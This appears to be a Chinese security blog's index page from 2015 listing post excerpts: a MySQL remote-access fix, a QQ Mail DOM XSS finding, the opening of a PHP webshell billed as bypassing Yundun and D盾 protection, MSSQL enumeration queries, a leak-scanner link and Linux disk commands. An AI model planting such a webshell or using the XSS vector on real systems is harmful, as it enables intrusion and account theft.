关于友情链接 做链接的朋友请进!!!

04
2015
12

Navicat远程连接虚拟机Mysql的时候报错mysql 1130的解决方法

闲来无事,在自己笔记本上安装了虚拟机并且配置了nginx+php+mysql,这些东西都已顺利搭建


唯一的一点就见表的时候不方便,所以用navicta工具连接自己虚拟机的mysql


结果出现了如下问题:ERROR 1130: Host '192.168.116.128' is not allowed to connect to this MySQL server


(不

02
2015
12

mail.qq.com DOM XSS

首先发现一处getcontent


http://mail.qq.com/cgi-bin/readtemplate?t=compose✓=false&getcontenturl=http://mail.qq.com/test


查看调用的函数


29
2015
11

过云盾、D盾各种盾php shell

<?php
//过云盾、D盾各种盾shell
$id = $_GET['id'];
//debug
echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';
$s = '';
29
2015
11

MSSQL数据库的一些查询语句

MSSQL库名查表

 

Select Name From 库名..SysObjects Where XType='U' order By Name


MSSQL根据列名查表名


29
2015
11

BBScan -- 一个信息泄漏批量扫描脚本

有些朋友手上有几十万甚至上百万个域名,比如,乌云所有厂商的子域名


如果把这30万个域名全部扔给wvs,APPscan这样的重量级扫描器,显然是不合适的


对于一个拥有上万IP的企业,又如何快速定位可能存在弱点的机器呢? 


试试信息泄漏批量扫描脚本 BBScan


https://github.com/lijiejie/BBScan 

29
2015
11

Linux启用未使用的硬盘空间

首先,SSH使用root用户登陆,检查下当前硬盘空间使用状况:


fdisk -l


然后我们看看目前空间的使用情况:


df -hal